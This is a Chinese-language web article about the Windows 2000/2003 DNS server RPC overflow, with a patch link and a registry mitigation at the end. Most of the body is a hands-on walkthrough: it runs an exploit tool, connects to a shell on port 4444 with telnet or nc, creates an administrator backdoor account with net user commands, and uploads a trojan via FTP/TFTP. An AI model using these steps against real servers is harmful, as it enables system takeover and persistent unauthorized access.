两招填补Windows 2003 DNS服务器漏洞

来源:asp之家 时间:2010-02-20 19:25:00 

DNS 是域名系统 (Domain Name System) 的缩写。大家在上网时输入的网址,是通过域名解析系解析找到相对应的IP地址才能访问到网站。但是最近微软的Windows 2000和Windows 2003的DNS服务出现一个极高的安全漏洞,如果被黑客成功利用的话,那么我们的上网操作将遇到巨大的麻烦。

黑客姓名:张均诚

黑客特长:Windows系统漏洞研究

使用工具:DNS服务器漏洞利用工具

黑客自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这个漏洞的Nirbot蠕虫已经出现了各种变体。如果这个漏洞被黑客利用,那么系统就会被黑客完全控制。

DNS漏洞打开系统防线

Windows DNS如果存在这个漏洞,那么它在工作时,RPC接口如果处理到有非常规的畸形连接请求,就会向外释放管理员权限,让黑客可以利用这种漏洞完全控制系统。黑客可以通过向有这个漏洞的系统发送一个经过特别设计的RPC数据包,就能够获得该系统的管理员权限,远程执行任意指令。

小知识:什么是RPC

远程过程调用 (RPC) 是一种协议,程序可使用这种协议向网络中的另一台计算机上的程序请求服务。由于使用 RPC 的程序不必了解支持通信的网络协议的情况,因此 RPC 提高了程序的互操作性。

此前,RPC中也出现过数个漏洞,其中包括导致Blaster蠕虫大爆发的那个漏洞。这一最新的漏洞是一个堆栈溢出漏洞,给微软和Windows用户带来了很 * 烦。

根据微软发布的消息,Windows XP和Windows Vista不会受到这一DNS漏洞的影响,Windows 2000 Server SP4、Windows Server 2003 SP1、Windows Server 2003 SP2则存在这一漏洞。

轻松利用DNS漏洞

打开系统的命令提示符,接着跳转到DNS服务器漏洞利用工具所在的命令,然后执行该漏洞利用工具(图1)。

在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2)。需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次

当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功的添加了一个用户名为pcw密码为1234的用户。

然后我们再在命令行输入:net localgroup administrators pcw /add,成功执行的话就表示将该用户已经添加到管理员组(图3)。

现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时地远程管理操作了(图4)。

如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,通过FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。

漏洞危害大,不可不防

由于这个安全漏洞影响到Windows 2000 Server和Windows Server 2003服务器软件,而且每一种语言版本的Windows服务器都要有一个补丁。微软提供的补丁地址:http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,请根据自己情况选择对应的补丁。

同时,建议管理员采取如下措施以降低威胁。首先打开注册表编辑器,找到以 * 册表位置HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters,通过右键菜单新建一个名为“RpcProtocol”的DWORD项目,然后双击新建的值并将该值的数据更改为4,最后重启DNS服务更改生效即可。

标签:windows2003,DNS服务器,漏洞
0
投稿

猜你喜欢

  • 互联网之父:“//”一点用没有

    2009-10-16 10:17:00
  • Godaddy虚拟主机的优势

    2010-05-07 13:04:00
  • 如何规避收到垃圾邮件

    2010-03-01 19:16:00
  • 入门认识:典型邮件服务器

    2007-03-27 09:40:00
  • 坚固Windows组策略 有效阻止黑客

    2009-07-12 13:44:00
  • 10月份西联汇款取款指南

    2007-11-03 13:16:00
  • adsense西联汇款可在账户中修改拼音姓名

    2008-01-25 16:26:00
  • 五件购买WordPress空间后要做的事情

    2010-03-22 11:18:00
  • 传EA斥资2.5亿美元购Facebook游戏开发商

    2009-10-17 09:02:00
  • 腾讯大股东投资8年回报36倍 强调无意减持获利

    2009-10-16 08:35:00
  • 门户网站SEO主要工作

    2008-04-28 14:24:00
  • 美国主机GoDaddy怎样使用htaccess管理PHP的扩展名

    2010-04-09 12:58:00
  • 改头换面 帮助你的企业度过寒冬

    2008-12-16 11:55:00
  • 一个安全Web服务器的安装(5)

    2010-04-06 18:02:00
  • Windows 2000 上配置和应用安全模板

    2009-12-02 19:03:00
  • 远程桌面连接大集合

    2010-01-26 15:54:00
  • 用GridFTP传送文件

    2007-10-29 13:44:00
  • 什么是人肉搜索引擎及人肉搜索引擎起源

    2008-07-18 12:33:00
  • 英文网站不可缺少的六个页面

    2007-11-20 12:28:00
  • 迎接奥运,你准备好了吗?

    2008-04-10 08:58:00
  • asp之家 网站运营 m.aspxhome.com